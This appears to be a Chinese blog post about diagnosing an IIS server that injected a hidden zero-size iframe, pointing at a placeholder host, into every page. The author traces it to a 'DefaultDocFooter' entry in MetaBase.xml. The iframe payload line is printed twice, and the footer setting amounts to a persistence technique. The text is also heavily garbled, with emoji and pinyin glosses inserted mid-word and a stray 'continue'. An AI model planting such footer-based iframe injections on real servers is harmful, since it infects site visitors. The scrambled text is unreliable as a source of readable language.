一台服务器【wù qì】 几乎所【jǐ hū suǒ】有网站👏打开网🐄页 甚至HTML网页【wǎng yè】 都出现🐨了

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

这种样【zhè zhǒng yàng】式的代🛠码 有的在🚎头部【tóu bù】　有的在🚎尾部【wěi bù】 部分杀【bù fèn shā】📬毒软件🔝打开会报毒

打开💝HTML或💘ASP PHP页面【yè miàn】🕍 在源码中怎么【zhōng zěn me】也找不【yě zhǎo bú】到这段代码

分析原因

首先怀🆎疑♐ARP挂马【guà mǎ】，用防ARP的工具又没有发现有【fā xiàn yǒu】arp欺骗【qī piàn】🦁

而且🚑arp欺骗一般不会【bān bú huì】每次都【měi cì dōu】💨被插入代码，而是时【ér shì shí】⚫有时无

而且使用🚁http://127.0.0.1 或者【huò zhě】http://localhost 访问的〽时候也【shí hòu yě】可以找到这段代码【dài mǎ】🍿

arp欺骗的可能排除。

然后就【rán hòu jiù】想到可能是🐒JS被篡改【bèi cuàn gǎi】，或者是【huò zhě shì】其它的🏂包含文件，查找后【chá zhǎo hòu】没有发【méi yǒu fā】🔶现被改的💨页面 连新建【lián xīn jiàn】的💨HTML页面浏览的💨时候也会被插入这段【rù zhè duàn】代码【dài mǎ】🤵，那就只🍞能是🐒通过🕥ＩＩＳ挂上去的了🏥。

备份🎐iis数据然后重装iis，代码消【dài mǎ xiāo】失，将备份🐶的【de】iis恢复【huī fù】，问题又来了📃。

仔细寻【zǎi xì xún】找，问题应【wèn tí yīng】该出在IIS的配置文件【zhì wén jiàn】👡上【shàng】，打开配👪置文件【zhì wén jiàn】👡，没有发现那段🕧代码💢。

那很有【nà hěn yǒu】可能是🤙调用了【diào yòng le】某个文件，这个怎🍜么查啊，忽然想起了大【qǐ le dà】名鼎鼎🛥的【de】🧢Filemon

本地载【běn dì zǎi】🎳了一个🗃上【shàng】传到服务器【fú wù qì】上【shàng】，打开👠Filemon，数据太多了，过滤掉【guò lǜ diào】一些没🚰有用的

只留下iis的进程，数据还【shù jù hái】🚡是很多【shì hěn duō】，看来服【kàn lái fú】🗂务器上的站点还是挺多人在访问的🌴。

关掉所有站点,建了一【jiàn le yī】⬇个测试站点anky 目录为【mù lù wéi】D:\www\　在下面【zài xià miàn】🎙建了一【jiàn le yī】⬇个空白🏼页面test.htm

访问一下【xià】这个🎏页面代【yè miàn dài】码被插进来了🧀，再看一下【xià】Filemon　奇怪怎么读取【me dú qǔ】🕯C:\Inetpub\wwwroot\iisstart.htm

打开🌉C:\Inetpub\wwwroot\iisstart.htm一看【yī kàn】，里面就【lǐ miàn jiù】⛔躺着

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

把代码删除了【shān chú le】留空🍤，访问【fǎng wèn】🐠test.htm 正常了，把C:\Inetpub\wwwroot\iisstart.htm删除了【shān chú le】再访问【fǎng wèn】🍘

test.htm　出现【chū xiàn】　“读取数🎵据页脚🥈文件出错”问题就出这里【chū zhè lǐ】了【le】，看来是🏸调用了【le】

这个文件。

把【bǎ】C:\Inetpub\wwwroot\iisstart.htm清空就【qīng kōng jiù】🛅正常了，这样怎【zhè yàng zěn】🗜么行，解决问题当然要连根📡拔掉。

continue

有没有【yǒu méi yǒu】可能是扩展造🈴成的【chéng de】😟，到扩展🈶中检查了一遍【le yī biàn】全部都是正常的

当然 通过ISAPI 挂马的也是存在的

左想右想最后还是觉得配置文件有问题

打开配【dǎ kāi pèi】⛹置文件【zhì wén jiàn】，配置文件【zhì wén jiàn】在📐%windir%\system32\inetsrv\MetaBase.xml

用记事本打开【běn dǎ kāi】，查找🆕iisstart.htm　找到一【zhǎo dào yī】行【háng】😔，开始以【kāi shǐ yǐ】为是默认站点，后来一想不对❔啊🔟

默认站点都删除了，再仔细一看这句代码为

DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"

删除掉这一行，问题彻底解决了。